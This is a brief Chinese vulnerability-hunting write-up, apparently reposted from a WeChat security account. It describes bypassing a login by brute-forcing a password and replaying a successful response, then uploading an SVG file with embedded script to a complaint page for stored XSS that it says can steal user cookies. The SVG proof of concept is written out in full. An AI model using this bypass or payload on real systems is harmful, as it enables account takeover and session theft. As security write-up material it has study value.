昨天带着
以111111为账号,对密码进行爆破,任意选择一个返回包statusCode参数为200的包,将响应头及响应体进行替换到刚才抓到的登录的返回包里,一直放包,得以绕过机制认证,获取到账号权限
访问
https://x.x.x.x/app.Client/index.jsp?m=client&c=Complain&a=showComplain&mainTypeId=2
,最下面有上传文件的地方,上传svg文件,POC为
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("SVG XSS");
</script>
</svg>
可实现弹出控制台打印,或者跳转
拼接返回文件路径,造成弹窗,可获取用户cookie
本文由学员投稿而成
原文始发于微信公众号(湘安无事):【漏洞挖掘】逻辑绕过+文件上传造成XSS
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论